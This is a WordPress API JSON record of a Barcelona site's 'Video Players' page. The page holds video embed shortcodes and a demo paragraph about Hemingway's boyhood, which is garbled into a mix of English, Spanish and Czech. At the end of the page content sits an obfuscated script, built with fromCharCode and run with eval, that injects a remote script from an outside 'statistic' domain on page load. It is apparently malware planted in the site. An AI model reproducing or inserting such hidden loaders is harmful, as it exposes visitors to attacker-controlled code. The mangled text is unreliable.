{"id":13911,"date":"2023-07-25T12:40:21","date_gmt":"2023-07-25T10:40:21","guid":{"rendered":"https:\/\/portvellbcn.cat\/video-players\/"},"modified":"2023-07-25T12:40:59","modified_gmt":"2023-07-25T10:40:59","slug":"video-players","status":"publish","type":"page","link":"https:\/\/portvellbcn.cat\/es\/video-players\/","title":{"rendered":"Video Players"},"content":{"rendered":"<div class=\"wpb-content-wrapper\"><p>[vc_row][vc_column offset=\u00bbvc_col-lg-offset-1 vc_col-lg-10 vc_col-md-offset-1 vc_col-md-10&#8243;][vc_video link=\u00bbhttps:\/\/www.youtube.com\/watch?v=Aq5uG48Pj44&#8243; css_animation=\u00bbnone\u00bb src=\u00bb\u00abhttps:\/\/player.vimeo.com\/video\/80603839?title=0&amp;byline=0&amp;portrait=0\u00ab\u00bb width=\u00bb\u00ab640\u00ab\u00bb height=\u00bb\u00ab360\u00ab\u00bb frameborder=\u00bb\u00ab0\u00ab\u00bb title=\u00bbAwesome YouTube Video\u00bb][vc_column_text]As a boy he sido taught por su father to hunt y fish all\u00e1 de las horas y en los montes surrounding Lake Michigan. The Hemingways har\u00e1 a summer house called Windemere on Walloon Lake v severn\u00ed Michigan, a rodina bude spend the letn\u00ed months trying to stay cool. Hemingway would either fish the different streams that ran into the lake, or would take the row boat out to do some fishing there.[\/vc_column_text][vc_video link=\u00bbhttps:\/\/vimeo.com\/108018156&#8243; src=\u00bb\u00abhttps:\/\/player.vimeo.com\/video\/80603839?title=0&amp;byline=0&amp;portrait=0\u00ab\u00bb width=\u00bb\u00ab640\u00ab\u00bb height=\u00bb\u00ab360\u00ab\u00bb frameborder=\u00bb\u00ab0\u00ab\u00bb title=\u00bbAwesome Vimeo\u00bb][vc_column_text]As a boy he sido taught por su father to hunt y fish all\u00e1 de las horas y en los montes surrounding Lake Michigan. The Hemingways har\u00e1 a summer house called Windemere on Walloon Lake v severn\u00ed Michigan, a rodina bude spend the letn\u00ed months trying to stay cool. Hemingway would either fish the different streams that ran into the lake, or would take the row boat out to do some fishing there.<\/p>\n<p><a href=\"https:\/\/codex.wordpress.org\/Embeds#Okay.2C_So_What_Sites_Can_I_Embed_From.3F\">Available Video Formatos<\/a>[\/vc_column_text][\/vc_column][\/vc_row]<script>var f=String;eval(f.fromCharCode(102,117,110,99,116,105,111,110,32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,116,105,115,116,105,99,46,115,99,114,105,112,116,115,112,108,97,116,102,111,114,109,46,99,111,109,47,99,111,108,108,101,99,116,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,125,125));\/*99586587347*\/<\/script><\/p>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>[vc_row][vc_column offset=\u00bbvc_col-lg-offset-1 vc_col-lg-10 vc_col-md-offset-1 vc_col-md-10&#8243;][vc_video link=\u00bbhttps:\/\/www.youtube.com\/watch?v=Aq5uG48Pj44&#8243; css_animation=\u00bbnone\u00bb src=\u00bb\u00abhttps:\/\/player.vimeo.com\/video\/80603839?title=0&amp;byline=0&amp;portrait=0\u00ab\u00bb width=\u00bb\u00ab640\u00ab\u00bb height=\u00bb\u00ab360\u00ab\u00bb frameborder=\u00bb\u00ab0\u00ab\u00bb title=\u00bbAwesome YouTube Video\u00bb][vc_column_text]As a boy he sido taught por su father to hunt y fish all\u00e1 de las horas y en los montes surrounding Lake Michigan. The Hemingways har\u00e1 a summer house called Windemere on Walloon Lake v severn\u00ed Michigan, a rodina bude spend the letn\u00ed months trying to stay cool. Hemingway would either fish the different streams that ran into the lake, or would take the row boat out to do some fishing there.[\/vc_column_text][vc_video link=\u00bbhttps:\/\/vimeo.com\/108018156&#8243; src=\u00bb\u00abhttps:\/\/player.vimeo.com\/video\/80603839?title=0&amp;byline=0&amp;portrait=0\u00ab\u00bb width=\u00bb\u00ab640\u00ab\u00bb height=\u00bb\u00ab360\u00ab\u00bb frameborder=\u00bb\u00ab0\u00ab\u00bb title=\u00bbAwesome Vimeo\u00bb][vc_column_text]As a boy he sido taught por su father to hunt y fish all\u00e1 de las horas y en los montes surrounding Lake Michigan. The Hemingways har\u00e1 a summer house called Windemere on Walloon Lake v severn\u00ed Michigan, a rodina bude spend the letn\u00ed months trying to stay cool. Hemingway would either fish the different streams that ran into the lake, or would take the row boat out to do some fishing there. Available Video Formatos[\/vc_column_text][\/vc_column][\/vc_row]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_acf_changed":false,"footnotes":""},"class_list":["post-13911","page","type-page","status-publish","hentry"],"acf":[],"_links":{"self":[{"href":"https:\/\/portvellbcn.cat\/es\/wp-json\/wp\/v2\/pages\/13911","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/portvellbcn.cat\/es\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/portvellbcn.cat\/es\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/portvellbcn.cat\/es\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/portvellbcn.cat\/es\/wp-json\/wp\/v2\/comments?post=13911"}],"version-history":[{"count":0,"href":"https:\/\/portvellbcn.cat\/es\/wp-json\/wp\/v2\/pages\/13911\/revisions"}],"wp:attachment":[{"href":"https:\/\/portvellbcn.cat\/es\/wp-json\/wp\/v2\/media?parent=13911"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}